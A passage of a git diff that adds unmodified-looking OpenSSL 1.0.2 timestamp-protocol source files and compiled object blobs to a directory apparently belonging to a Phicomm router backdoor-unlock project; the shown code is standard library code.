zfa9!}{3IX=IPM6^+vvT3xcl`Bj`8EplKKG;{fNTVezS_7(-c3u6yB-u3B^xP;nNDg
zNa0T_epV^`Sw;V1h5t+8xD#buFDtxT;jbxtjl$m&9P@*_R{A-j=m!=4nZj|WO8w)C
zAKc}V|Dx!te%jF?3D)Z$^ho{F1xKc?*9D5cy5ABCzfAFyR{Y>Tk^Xlm`j;!bsOX=r
z@W&MWD-}MkaD016|4%D^&QSP^ihfYx|5iA@RivLc6pn8c$;T9~`av0jW}(9CJ9)aq
z>!QBL#pS*Ip^M9V?<*IV_ZSP;?i;uA!<1W-PChD2lclkI*rJo0h4Gic!o#&13r|*2
zfqFDdcT}M|K8`ahT&Y^6F#Srb<u`+<k5s0@6O+}6(xi1CnZjXdl&+Bccu5TCZ)QQV
z#};*e+4T{F99Acj>S8<dHY7N+u!sBTQ6+>!g5*2#Lxd`9<rg;2SP0%BaQWW^23g?-
z4sPfldlEj~>VMTfO19|V`5vZ%5NUst1R|I5%e;>`$`R2nvz=l<S4bdoX(#g(aamSX
zXWRj~?4|C_RKVYiYnj+SVIP!=BA4?o@!eEF|8D#L3i}S%;N13OWZP{01LB8fT6Bc<
z$Neeo<@z`48z!&7DaokFJE@F+D7QU)Hk+yd8c0^T0&|7KaMm@mKOn~c0Qa(#xb6Q0
DGm@NS

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_print.c
new file mode 100644
index 0000000..31940ee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_print.c
@@ -0,0 +1,104 @@
+/* crypto/ts/ts_req_print.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/bn.h>
+#include <openssl/x509v3.h>
+#include <openssl/ts.h>
+
+/* Function definitions. */
+
+int TS_REQ_print_bio(BIO *bio, TS_REQ *a)
+{
+    int v;
+    ASN1_OBJECT *policy_id;
+    const ASN1_INTEGER *nonce;
+
+    if (a == NULL)
+        return 0;
+
+    v = TS_REQ_get_version(a);
+    BIO_printf(bio, "Version: %d\n", v);
+
+    TS_MSG_IMPRINT_print_bio(bio, TS_REQ_get_msg_imprint(a));
+
+    BIO_printf(bio, "Policy OID: ");
+    policy_id = TS_REQ_get_policy_id(a);
+    if (policy_id == NULL)
+        BIO_printf(bio, "unspecified\n");
+    else
+        TS_OBJ_print_bio(bio, policy_id);
+
+    BIO_printf(bio, "Nonce: ");
+    nonce = TS_REQ_get_nonce(a);
+    if (nonce == NULL)
+        BIO_printf(bio, "unspecified");
+    else
+        TS_ASN1_INTEGER_print_bio(bio, nonce);
+    BIO_write(bio, "\n", 1);
+
+    BIO_printf(bio, "Certificate required: %s\n",
+               TS_REQ_get_cert_req(a) ? "yes" : "no");
+
+    TS_ext_print_bio(bio, TS_REQ_get_exts(a));
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_print.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_print.o
new file mode 100644
index 0000000000000000000000000000000000000000..c8adc6524871623fd43872ba25d812b3c230ea4b
GIT binary patch
literal 3384
zcmbuB+iM(E9LIl~tv1GHH(D>zYC9Dbi+0Q=Z4(1Zc9YHSmTfl8CW6;tvza8T*-K|;
zZKF^@jIdzPH}N0nbMdJZgkT}Q6!A%X@lCMeLls5wM*V$f&PmRm%)Hni%(;B#_xqmv
znRz!`obHLmNLq|upxv6JL|5+GEl>Ex2})2u{hB=dSAOI7<oijEO3xQMzb)iD|K>Y?
zoV@|B{N_nN>)gzDzDRBPtl0S>cn7$xx$W`U&TnkB5ANy+ho5@$otw8Edlf_7)$Z=z
z=Kb9x*x1T%-r=L<)Yp6ZxiglRuR!#*^sCoWTi4cYml{oa(RSQgvoUTwvD8Pi&9z!}
z-6$2N#tmvW+?HLfE!S**Gt+ET?QTeYG-*2?J5(#4Z8-M1cFnPuSjp`p%1us=8&54P
zwi{mCc+MO#hmNO4+kQ25ad^laI&mz(w2%8Vzz+tHn^~Y9qAjpEKd}3PjAC!kQS8D%
z?9hSzy&v;Ho?-rocy|N?D<uX#?3qdoeh|+kjGjLegVTwDOrkfveO-8kX9(R#zuXFY
z8xP%a=$q_acU0UTO*ca=?vE~v@81i3|K13$Y<A&+xx?(~O8y>UF6U3U)5F65s01QE
zBDksX#|1y7@neE#G#<qJ+p+7-i1454qC{hYW6gDo)15k^=b7BAtc$<)%x3rr=At`f
zDT1Gm;O|B7Pb2te5&X*t{%r*RF@nc=gNBW(KY|~P;Hd~so@?>pwOUTC;h9x3i<84h
zMv$C9auUfYB%?@%kc=To(R|sO%bpElt;JfCtX#2_Nf)is^mI8pZ_TGO#jGXWR&39D
zE4XkdQz!*t%j(;@yJFSqepi6clyg?$%<NoYW?pGSGzztre`8s-C3u%Ir^CG(xV_+!
zF3+Sa7R%<cbBZhaa^9(Vz7NI&=_+4tm>9Kt_65&HopU9e7mn>vkoh+N&fY(_0((qw
zzSjt+SMp~C$G(3+;iC$FP~q~N!GBQU1>p~UzIb=^%Yy6ruPFQ>#s3Y#p>wywJ;8OI
ziweh`BFD8MICKsu{3F42olg{wIg~n=1cy$)!Y>Q1>s(bhz6(-kTX5(k6#kXq(0Nqh
z-zfaB!oL$7I!T3puW+1G+3wE@zenMJ3$FJc=Ntx(yIATZ6mBRSWf=N{XU9x;z3x>O
z$#gv@$X8{_vDYf5$GexzrHWS}bJ2ClbegEZJ!PiItTyX)yTLAvre~Y{Nj~m+mFk<K
zzS3x$EvMPy)3MH>5VTjVWv5cNcY1JJ1%sn8Wc}u!U<Q--eNYR0Wf?j45aw`#AJr}k
z!IqdT>~XXszqB}0uqXKe*T3+VSO@s1repk<K=c2`r#Kdx!~Ccw+kah!T$b(2d_u4x
z&F^#J@U+HdoXl~b$g=8sBMgT4zQhdwB3*lu>oVTpvTAbvB|FCjG^NM)3XqqMBG=>B
zn1`*ufy<Xot~1sjNXAPZ);8j1Mf-zdVR5$|42g%PzV?i0Rs0fVw0YF3gu5aveoXZL
K9f&EW$NvX6A{;3I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_utils.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_utils.c
new file mode 100644
index 0000000..362e5e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_utils.c
@@ -0,0 +1,232 @@
+/* crypto/ts/ts_req_utils.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/x509v3.h>
+#include <openssl/ts.h>
+
+int TS_REQ_set_version(TS_REQ *a, long version)
+{
+    return ASN1_INTEGER_set(a->version, version);
+}
+
+long TS_REQ_get_version(const TS_REQ *a)
+{
+    return ASN1_INTEGER_get(a->version);
+}
+
+int TS_REQ_set_msg_imprint(TS_REQ *a, TS_MSG_IMPRINT *msg_imprint)
+{
+    TS_MSG_IMPRINT *new_msg_imprint;
+
+    if (a->msg_imprint == msg_imprint)
+        return 1;
+    new_msg_imprint = TS_MSG_IMPRINT_dup(msg_imprint);
+    if (new_msg_imprint == NULL) {
+        TSerr(TS_F_TS_REQ_SET_MSG_IMPRINT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    TS_MSG_IMPRINT_free(a->msg_imprint);
+    a->msg_imprint = new_msg_imprint;
+    return 1;
+}
+
+TS_MSG_IMPRINT *TS_REQ_get_msg_imprint(TS_REQ *a)
+{
+    return a->msg_imprint;
+}
+
+int TS_MSG_IMPRINT_set_algo(TS_MSG_IMPRINT *a, X509_ALGOR *alg)
+{
+    X509_ALGOR *new_alg;
+
+    if (a->hash_algo == alg)
+        return 1;
+    new_alg = X509_ALGOR_dup(alg);
+    if (new_alg == NULL) {
+        TSerr(TS_F_TS_MSG_IMPRINT_SET_ALGO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    X509_ALGOR_free(a->hash_algo);
+    a->hash_algo = new_alg;
+    return 1;
+}
+
+X509_ALGOR *TS_MSG_IMPRINT_get_algo(TS_MSG_IMPRINT *a)
+{
+    return a->hash_algo;
+}
+
+int TS_MSG_IMPRINT_set_msg(TS_MSG_IMPRINT *a, unsigned char *d, int len)
+{
+    return ASN1_OCTET_STRING_set(a->hashed_msg, d, len);
+}
+
+ASN1_OCTET_STRING *TS_MSG_IMPRINT_get_msg(TS_MSG_IMPRINT *a)
+{
+    return a->hashed_msg;
+}
+
+int TS_REQ_set_policy_id(TS_REQ *a, ASN1_OBJECT *policy)
+{
+    ASN1_OBJECT *new_policy;
+
+    if (a->policy_id == policy)
+        return 1;
+    new_policy = OBJ_dup(policy);
+    if (new_policy == NULL) {
+        TSerr(TS_F_TS_REQ_SET_POLICY_ID, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_OBJECT_free(a->policy_id);
+    a->policy_id = new_policy;
+    return 1;
+}
+
+ASN1_OBJECT *TS_REQ_get_policy_id(TS_REQ *a)
+{
+    return a->policy_id;
+}
+
+int TS_REQ_set_nonce(TS_REQ *a, const ASN1_INTEGER *nonce)
+{
+    ASN1_INTEGER *new_nonce;
+
+    if (a->nonce == nonce)
+        return 1;
+    new_nonce = ASN1_INTEGER_dup(nonce);
+    if (new_nonce == NULL) {
+        TSerr(TS_F_TS_REQ_SET_NONCE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_INTEGER_free(a->nonce);
+    a->nonce = new_nonce;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_REQ_get_nonce(const TS_REQ *a)
+{
+    return a->nonce;
+}
+
+int TS_REQ_set_cert_req(TS_REQ *a, int cert_req)
+{
+    a->cert_req = cert_req ? 0xFF : 0x00;
+    return 1;
+}
+
+int TS_REQ_get_cert_req(const TS_REQ *a)
+{
+    return a->cert_req ? 1 : 0;
+}
+
+STACK_OF(X509_EXTENSION) *TS_REQ_get_exts(TS_REQ *a)
+{
+    return a->extensions;
+}
+
+void TS_REQ_ext_free(TS_REQ *a)
+{
+    if (!a)
+        return;
+    sk_X509_EXTENSION_pop_free(a->extensions, X509_EXTENSION_free);
+    a->extensions = NULL;
+}
+
+int TS_REQ_get_ext_count(TS_REQ *a)
+{
+    return X509v3_get_ext_count(a->extensions);
+}
+
+int TS_REQ_get_ext_by_NID(TS_REQ *a, int nid, int lastpos)
+{
+    return X509v3_get_ext_by_NID(a->extensions, nid, lastpos);
+}
+
+int TS_REQ_get_ext_by_OBJ(TS_REQ *a, ASN1_OBJECT *obj, int lastpos)
+{
+    return X509v3_get_ext_by_OBJ(a->extensions, obj, lastpos);
+}
+
+int TS_REQ_get_ext_by_critical(TS_REQ *a, int crit, int lastpos)
+{
+    return X509v3_get_ext_by_critical(a->extensions, crit, lastpos);
+}
+
+X509_EXTENSION *TS_REQ_get_ext(TS_REQ *a, int loc)
+{
+    return X509v3_get_ext(a->extensions, loc);
+}
+
+X509_EXTENSION *TS_REQ_delete_ext(TS_REQ *a, int loc)
+{
+    return X509v3_delete_ext(a->extensions, loc);
+}
+
+int TS_REQ_add_ext(TS_REQ *a, X509_EXTENSION *ex, int loc)
+{
+    return X509v3_add_ext(&a->extensions, ex, loc) != NULL;
+}
+
+void *TS_REQ_get_ext_d2i(TS_REQ *a, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(a->extensions, nid, crit, idx);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_utils.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_req_utils.o
new file mode 100644
index 0000000000000000000000000000000000000000..c365b9971482be2113c21dad56540a9e94283077
GIT binary patch
literal 5752
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_print.c
new file mode 100644
index 0000000..e706a56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_print.c
@@ -0,0 +1,281 @@
+/* crypto/ts/ts_resp_print.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/bn.h>
+#include <openssl/x509v3.h>
+#include "ts.h"
+
+struct status_map_st {
+    int bit;
+    const char *text;
+};
+
+/* Local function declarations. */
+
+static int TS_status_map_print(BIO *bio, struct status_map_st *a,
+                               ASN1_BIT_STRING *v);
+static int TS_ACCURACY_print_bio(BIO *bio, const TS_ACCURACY *accuracy);
+
+/* Function definitions. */
+
+int TS_RESP_print_bio(BIO *bio, TS_RESP *a)
+{
+    TS_TST_INFO *tst_info;
+
+    BIO_printf(bio, "Status info:\n");
+    TS_STATUS_INFO_print_bio(bio, TS_RESP_get_status_info(a));
+
+    BIO_printf(bio, "\nTST info:\n");
+    tst_info = TS_RESP_get_tst_info(a);
+    if (tst_info != NULL)
+        TS_TST_INFO_print_bio(bio, TS_RESP_get_tst_info(a));
+    else
+        BIO_printf(bio, "Not included.\n");
+
+    return 1;
+}
+
+int TS_STATUS_INFO_print_bio(BIO *bio, TS_STATUS_INFO *a)
+{
+    static const char *status_map[] = {
+        "Granted.",
+        "Granted with modifications.",
+        "Rejected.",
+        "Waiting.",
+        "Revocation warning.",
+        "Revoked."
+    };
+    static struct status_map_st failure_map[] = {
+        {TS_INFO_BAD_ALG,
+         "unrecognized or unsupported algorithm identifier"},
+        {TS_INFO_BAD_REQUEST,
+         "transaction not permitted or supported"},
+        {TS_INFO_BAD_DATA_FORMAT,
+         "the data submitted has the wrong format"},
+        {TS_INFO_TIME_NOT_AVAILABLE,
+         "the TSA's time source is not available"},
+        {TS_INFO_UNACCEPTED_POLICY,
+         "the requested TSA policy is not supported by the TSA"},
+        {TS_INFO_UNACCEPTED_EXTENSION,
+         "the requested extension is not supported by the TSA"},
+        {TS_INFO_ADD_INFO_NOT_AVAILABLE,
+         "the additional information requested could not be understood "
+         "or is not available"},
+        {TS_INFO_SYSTEM_FAILURE,
+         "the request cannot be handled due to system failure"},
+        {-1, NULL}
+    };
+    long status;
+    int i, lines = 0;
+
+    /* Printing status code. */
+    BIO_printf(bio, "Status: ");
+    status = ASN1_INTEGER_get(a->status);
+    if (0 <= status
+        && status < (long)(sizeof(status_map) / sizeof(status_map[0])))
+        BIO_printf(bio, "%s\n", status_map[status]);
+    else
+        BIO_printf(bio, "out of bounds\n");
+
+    /* Printing status description. */
+    BIO_printf(bio, "Status description: ");
+    for (i = 0; i < sk_ASN1_UTF8STRING_num(a->text); ++i) {
+        if (i > 0)
+            BIO_puts(bio, "\t");
+        ASN1_STRING_print_ex(bio, sk_ASN1_UTF8STRING_value(a->text, i), 0);
+        BIO_puts(bio, "\n");
+    }
+    if (i == 0)
+        BIO_printf(bio, "unspecified\n");
+
+    /* Printing failure information. */
+    BIO_printf(bio, "Failure info: ");
+    if (a->failure_info != NULL)
+        lines = TS_status_map_print(bio, failure_map, a->failure_info);
+    if (lines == 0)
+        BIO_printf(bio, "unspecified");
+    BIO_printf(bio, "\n");
+
+    return 1;
+}
+
+static int TS_status_map_print(BIO *bio, struct status_map_st *a,
+                               ASN1_BIT_STRING *v)
+{
+    int lines = 0;
+
+    for (; a->bit >= 0; ++a) {
+        if (ASN1_BIT_STRING_get_bit(v, a->bit)) {
+            if (++lines > 1)
+                BIO_printf(bio, ", ");
+            BIO_printf(bio, "%s", a->text);
+        }
+    }
+
+    return lines;
+}
+
+int TS_TST_INFO_print_bio(BIO *bio, TS_TST_INFO *a)
+{
+    int v;
+    ASN1_OBJECT *policy_id;
+    const ASN1_INTEGER *serial;
+    const ASN1_GENERALIZEDTIME *gtime;
+    TS_ACCURACY *accuracy;
+    const ASN1_INTEGER *nonce;
+    GENERAL_NAME *tsa_name;
+
+    if (a == NULL)
+        return 0;
+
+    /* Print version. */
+    v = TS_TST_INFO_get_version(a);
+    BIO_printf(bio, "Version: %d\n", v);
+
+    /* Print policy id. */
+    BIO_printf(bio, "Policy OID: ");
+    policy_id = TS_TST_INFO_get_policy_id(a);
+    TS_OBJ_print_bio(bio, policy_id);
+
+    /* Print message imprint. */
+    TS_MSG_IMPRINT_print_bio(bio, TS_TST_INFO_get_msg_imprint(a));
+
+    /* Print serial number. */
+    BIO_printf(bio, "Serial number: ");
+    serial = TS_TST_INFO_get_serial(a);
+    if (serial == NULL)
+        BIO_printf(bio, "unspecified");
+    else
+        TS_ASN1_INTEGER_print_bio(bio, serial);
+    BIO_write(bio, "\n", 1);
+
+    /* Print time stamp. */
+    BIO_printf(bio, "Time stamp: ");
+    gtime = TS_TST_INFO_get_time(a);
+    ASN1_GENERALIZEDTIME_print(bio, gtime);
+    BIO_write(bio, "\n", 1);
+
+    /* Print accuracy. */
+    BIO_printf(bio, "Accuracy: ");
+    accuracy = TS_TST_INFO_get_accuracy(a);
+    if (accuracy == NULL)
+        BIO_printf(bio, "unspecified");
+    else
